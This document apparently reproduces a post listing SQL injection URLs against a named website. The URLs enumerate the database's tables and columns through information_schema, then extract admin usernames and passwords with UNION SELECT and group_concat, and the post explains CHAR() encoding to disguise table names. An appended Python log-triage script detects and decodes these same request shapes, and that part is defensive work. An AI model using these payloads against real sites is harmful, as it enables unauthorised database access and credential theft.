Read out all tables:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
Read out all columns of a table:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
Note: (97,100,109,105,110) is the ASCII encoding of "admin"; other names are encoded the same way.
Read out the contents of the table columns:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
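
Added example, not part of the original post: a log-triage helper that URL-decodes a request line, flags the UNION SELECT shapes listed above, and decodes CHAR(...) literals such as char(97,100,109,105,110) so an analyst can see which table a request targeted. The request lines, paths and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (hypothetical paths), shaped like the requests above.
SAMPLE_REQUESTS = [
    "/1.php?id=42",
    "/1.php?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()",
    "/list.php?ssec=-1+UNION+SELECT+1,group_concat(column_name),3+from+information_schema.COLUMNS+where+table_name=char(97,100,109,105,110)%23",
    "/1.php?id=-1 union select 1,group_concat(admin_name,0x3a,admin_password),3 from admin%23",
    "/news.php?title=student+union+select+committee",  # benign text, must not be flagged
]

# UNION [ALL] SELECT ... FROM: requiring FROM avoids flagging ordinary prose.
UNION_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b.+?\bfrom\b", re.I)
SCHEMA_RE = re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)
CHAR_RE = re.compile(r"\bchar\(\s*(\d{1,3}(?:\s*,\s*\d{1,3})*)\s*\)", re.I)


def decode_char_calls(text):
    """Return the strings hidden in CHAR(n,n,...) calls, e.g. encoded table names."""
    decoded = []
    for match in CHAR_RE.finditer(text):
        codes = [int(n) for n in match.group(1).split(",")]
        if all(code < 256 for code in codes):
            decoded.append("".join(chr(code) for code in codes))
    return decoded


def triage(request_line):
    """Classify one request line; return None when no UNION SELECT shape is present."""
    path, _, query = request_line.partition("?")
    decoded = unquote_plus(query)  # '+' becomes a space, %23 becomes '#'
    if not UNION_RE.search(decoded):
        return None
    schema = SCHEMA_RE.search(decoded)
    return {
        "path": path,
        "stage": "schema-enumeration" if schema else "data-extraction",
        "schema_view": schema.group(1).lower() if schema else None,
        "decoded_literals": decode_char_calls(decoded),
    }


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(triage(line), "<-", line[:60])
```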